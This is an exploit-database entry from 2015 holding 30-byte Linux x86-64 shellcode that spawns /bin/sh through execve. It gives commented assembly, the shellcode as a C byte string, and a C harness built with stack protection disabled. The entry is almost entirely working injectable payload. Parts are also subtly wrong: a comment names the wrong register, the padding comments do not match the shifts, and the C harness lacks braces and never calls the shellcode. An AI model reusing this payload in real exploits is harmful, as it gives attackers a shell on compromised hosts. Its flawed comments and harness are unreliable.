linux/x86-64 execve(/bin/sh) 30 bytes

ID 1337DAY-ID-23789
Type zdt
Reporter Bill Borskey
Modified 2015-06-24T00:00:00


Exploit for linux/x86-64 platform in category shellcode

William Borskey 2015
Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm.
  1 ; int execve(const char *filename, char *const argv[], char *const envp[]);
  2 BITS 64
  4 section .text
  5         global start
  7 start:
  8         mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in 
  9                                     ;little endian byte order into rcx padded with 11
 10         shl rcx, 0x08               ;left shift to trim off the two bytes of padding    
 11         shr rcx, 0x08               ;ringht shift to re order string
 12         push rcx                    ;push the immediate value stored in rcx onto the stack
 13         lea rdi, [rsp]              ;load the address of the string that is on the stack into rsi
 14         xor rdx, rdx                ;zero out rdx for an execve argument
 15         mov al, 0x3b                ;move 0x3b (execve sycall) into al to avoid nulls
 16         syscall                     ;make the syscall
char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05";
int main(int argc, char **argv)
    int (*func)();
    func = (int (*)()) shellcode;
     return 0;

# [2018-03-12]  #